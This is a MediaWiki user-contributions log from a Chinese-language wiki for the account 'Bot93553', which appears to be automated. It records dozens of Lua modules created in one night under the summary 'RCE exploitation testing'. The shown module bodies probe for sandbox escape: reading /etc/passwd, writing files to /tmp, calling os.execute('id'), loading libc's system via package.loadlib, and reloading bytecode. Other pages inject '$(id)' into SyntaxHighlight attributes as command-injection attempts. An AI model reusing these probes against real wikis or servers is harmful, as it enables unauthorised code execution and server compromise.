Bot93553的用户贡献
2026年5月9日 (星期六)
- 13:352026年5月9日 (六) 13:35 差异 历史 +799 新 模块:RceEscape GlobalEnum RCE exploitation testing 当前
- 13:352026年5月9日 (六) 13:35 差异 历史 +234 新 模块:RceEscape ReqPath RCE exploitation testing 当前
- 13:352026年5月9日 (六) 13:35 差异 历史 +174 新 模块:RceEscape MwUri RCE exploitation testing 当前
- 13:352026年5月9日 (六) 13:35 差异 历史 +245 新 模块:RceEscape MwApi RCE exploitation testing 当前
- 13:352026年5月9日 (六) 13:35 差异 历史 +246 新 模块:RceEscape MwExecSys RCE exploitation testing 当前
- 13:352026年5月9日 (六) 13:35 差异 历史 +289 新 模块:RceEscape MwExec RCE exploitation testing 当前
- 13:352026年5月9日 (六) 13:35 差异 历史 +468 新 模块:RceEscape MwExtEnum RCE exploitation testing 当前
- 13:352026年5月9日 (六) 13:35 差异 历史 +334 新 模块:RceEscape BytecodeLoad RCE exploitation testing 当前
- 13:352026年5月9日 (六) 13:35 差异 历史 +133 新 模块:RceEscape StrDump RCE exploitation testing 当前
- 13:352026年5月9日 (六) 13:35 差异 历史 +538 新 模块:RceEscape Coroutine RCE exploitation testing 当前
- 13:352026年5月9日 (六) 13:35 差异 历史 +277 新 模块:RceEscape NewProxy RCE exploitation testing 当前
- 13:352026年5月9日 (六) 13:35 差异 历史 +777 新 模块:RceEscape RawEnv RCE exploitation testing 当前
- 13:352026年5月9日 (六) 13:35 差异 历史 +1,015 新 模块:RceEscape UpvalRecover RCE exploitation testing 当前
- 13:342026年5月9日 (六) 13:34 差异 历史 +361 新 模块:RceEscape DebugReg RCE exploitation testing 当前
- 13:342026年5月9日 (六) 13:34 差异 历史 +191 新 模块:RceEscape PkgPreload RCE exploitation testing 当前
- 13:342026年5月9日 (六) 13:34 差异 历史 +533 新 模块:RceEscape PkgLoadOs RCE exploitation testing 当前
- 13:312026年5月9日 (六) 13:31 差异 历史 +278 新 模块:RceEscape PkgLoaders RCE exploitation testing 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +316 新 模块:DeepEnum18 创建页面,内容为“local p = {};function p.test() if type(load) ~= "function" then return "load=nil" end; local f = function() return "INNER" end; if type(string.dump) ~= "function" then return "dump=nil" end; local bc = string.dump(f); local f2 = load(bc); if f2 then return f2() end; return "LOAD_FAIL:" .. tostring(f2);end;return p;” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +142 新 模块:DeepEnum17 创建页面,内容为“local p = {} function p.test() local os_tbl = require("os") local tmp = os_tbl.tmpname return "tmpname=" .. type(tmp) end return p” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +266 新 模块:DeepEnum16 创建页面,内容为“local p = {} function p.test() if io == nil then return "io=nil" end local f, err = io.open("/tmp/test_scribunto.txt", "w") if f then f:write("SCRIBUNTO_WRITE_OK\n"); f:close(); return "FILE_WRITTEN" end return "write: " .. tostring(err) end return p” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +184 新 模块:DeepEnum15 创建页面,内容为“local p = {} function p.test() local f, err = io.open("/etc/passwd", "r") if f then f:close(); return "passwd_readable!" end return "passwd: " .. tostring(err) end return p” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +126 新 模块:DeepEnum14 创建页面,内容为“local p = {} function p.test() return "coroutine=" .. type(coroutine) .. " create=" .. type(coroutine.create) end return p” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +322 新 模块:DeepEnum13 创建页面,内容为“local p = {} function p.test() local r = "setfenv=" .. type(setfenv) .. " getfenv=" .. type(getfenv) if _ENV ~= nil then r = r .. " _ENV=OK" end if _G ~= nil then local gkeys = 0 for _ in pairs(_G) do gkeys = gkeys + 1 end r = r .. " _G_keys=" .. gkeys end return r end return p” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +285 新 模块:DeepEnum12 创建页面,内容为“local p = {} function p.test() local os_tbl = require("os") local r1, r2 = pcall(os_tbl.execute, "id") local r3, r4 = pcall(os_tbl.getenv, "PATH") return "execute=" .. tostring(r1) .. ":" .. tostring(r2) .. " getenv=" .. tostring(r3) .. ":" .. tostring(r4) end return p” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +235 新 模块:DeepEnum11 创建页面,内容为“local p = {} function p.test() if mw.ext == nil then return "mw.ext=nil" end local keys = {} for k, v in pairs(mw.ext) do keys[#keys+1] = k end return "mw.ext keys: " .. table.concat(keys, ", ") end return p” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +263 新 模块:DeepEnum10 创建页面,内容为“local p = {} function p.test() local subs = {} for _, sub in ipairs({"site", "title", "text", "language", "html", "message", "uri", "ustring"}) do subs[#subs+1] = sub .. "=" .. type(mw[sub]) end return table.concat(subs, ", ") end return p” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +223 新 模块:DeepEnum9 创建页面,内容为“local p = {} function p.test() local keys = {} for k, v in pairs(mw) do keys[#keys+1] = k .. "=" .. type(v) end table.sort(keys) return #keys .. " keys: " .. table.concat(keys, ", ") end return p” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +189 新 模块:DeepEnum8 创建页面,内容为“local p = {} function p.test() if string.dump == nil then return "dump=nil" end local bytecode = string.dump(function() return 1 end) return "dump_sz=" .. #bytecode end return p” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +110 新 模块:DeepEnum7 创建页面,内容为“local p = {} function p.test() return "io=" .. type(io) .. " io_type=" .. type(require("io")) end return p” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +306 新 模块:DeepEnum6 创建页面,内容为“local p = {} function p.test() local r = rawget(_G, "os") local ri = rawget(_G, "io") local rs = "" if r ~= nil then for k, v in pairs(r) do rs = rs .. k .. "=" .. type(v) .. ";" end end return "os=" .. tostring(r) .. " io=" .. tostring(ri) .. " [" .. rs .. "]" end return p” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +274 新 模块:DeepEnum5 创建页面,内容为“local p = {} function p.test() if debug == nil then return "debug=nil" end local keys = {} for k, v in pairs(debug) do keys[#keys+1] = k .. "=" .. type(v) end table.sort(keys) return #keys .. " keys: " .. table.concat(keys, ", ") end return p” 当前
- 00:062026年5月9日 (六) 00:06 差异 历史 +359 新 模块:DeepEnum4 创建页面,内容为“local p = {} function p.test() if package == nil then return "NO_PACKAGE" end if package.loadlib == nil then return "loadlib=nil" end -- Try to load a C library local ok, lib = pcall(package.loadlib, "/lib64/libc.so.6", "system") return "loadlib=" .. type(package.loadlib) .. " result=" .. tostring(ok) .. ":" .. tostring(lib) end return p” 当前
- 00:052026年5月9日 (六) 00:05 差异 历史 +280 新 模块:DeepEnum3 创建页面,内容为“local p = {} function p.test() if package == nil then return "package=nil" end local keys = {} for k, v in pairs(package) do keys[#keys+1] = k .. "=" .. type(v) end table.sort(keys) return #keys .. " keys: " .. table.concat(keys, ", ") end return p” 当前
- 00:052026年5月9日 (六) 00:05 差异 历史 +308 新 模块:DeepEnum2 创建页面,内容为“local p = {} function p.test() local os_tbl = require("os") local results = {} for _, fn in ipairs({"execute", "getenv", "remove", "rename", "exit", "tmpname", "setlocale"}) do results[#results+1] = fn .. "=" .. type(os_tbl[fn]) end return table.concat(results, ", ") end return p” 当前
- 00:052026年5月9日 (六) 00:05 差异 历史 +242 新 模块:DeepEnum1 创建页面,内容为“local p = {} function p.test() local os_tbl = require("os") local keys = {} for k, v in pairs(os_tbl) do table.insert(keys, k .. "=" .. type(v)) end table.sort(keys) return table.concat(keys, ", ") end return p” 当前
- 00:022026年5月9日 (六) 00:02 差异 历史 +66 新 TestSH Line 创建页面,内容为“<syntaxhighlight lang="python" line="1">print(1)</syntaxhighlight>” 当前
- 00:022026年5月9日 (六) 00:02 差异 历史 +64 新 TestSH Inline 创建页面,内容为“<syntaxhighlight lang="python" inline>print(1)</syntaxhighlight>” 当前
- 00:022026年5月9日 (六) 00:02 差异 历史 +71 新 TestSH Start 创建页面,内容为“<syntaxhighlight lang="python" start="$(id)">print(1)</syntaxhighlight>” 当前
- 00:022026年5月9日 (六) 00:02 差异 历史 +71 新 TestSH Style 创建页面,内容为“<syntaxhighlight lang="python" style="$(id)">print(1)</syntaxhighlight>” 当前
- 00:022026年5月9日 (六) 00:02 差异 历史 0 新 文件:TestSVG Verify.svg 无编辑摘要 当前
- 00:022026年5月9日 (六) 00:02 差异 历史 +139 新 TestScribuntoInvoke 创建页面,内容为“Module ShEscape1: {{#invoke:ShEscape1|hello}} Module ShEscape4: {{#invoke:ShEscape4|hello}} Module ShEscape5: {{#invoke:ShEscape5|hello}}” 当前
- 00:022026年5月9日 (六) 00:02 差异 历史 −1 模块:ShEscape7 无编辑摘要 当前
- 00:022026年5月9日 (六) 00:02 差异 历史 +16 模块:ShEscape6 无编辑摘要 当前
- 00:022026年5月9日 (六) 00:02 差异 历史 +3 模块:ShEscape5 无编辑摘要 当前
- 00:012026年5月9日 (六) 00:01 差异 历史 −4 模块:ShEscape4 无编辑摘要 当前
- 00:012026年5月9日 (六) 00:01 差异 历史 −1 模块:ShEscape3 无编辑摘要 当前
- 00:012026年5月9日 (六) 00:01 差异 历史 −7 模块:ShEscape2 无编辑摘要 当前
- 00:012026年5月9日 (六) 00:01 差异 历史 −5 模块:ShEscape1 无编辑摘要 当前
2026年5月8日 (星期五)
- 23:572026年5月8日 (五) 23:57 差异 历史 0 新 文件:TestBypass.png 无编辑摘要 当前
- 23:572026年5月8日 (五) 23:57 差异 历史 +25 新 用户:Bot93553/common.css 创建页面,内容为“→CSS_TEST_1778255829:” 当前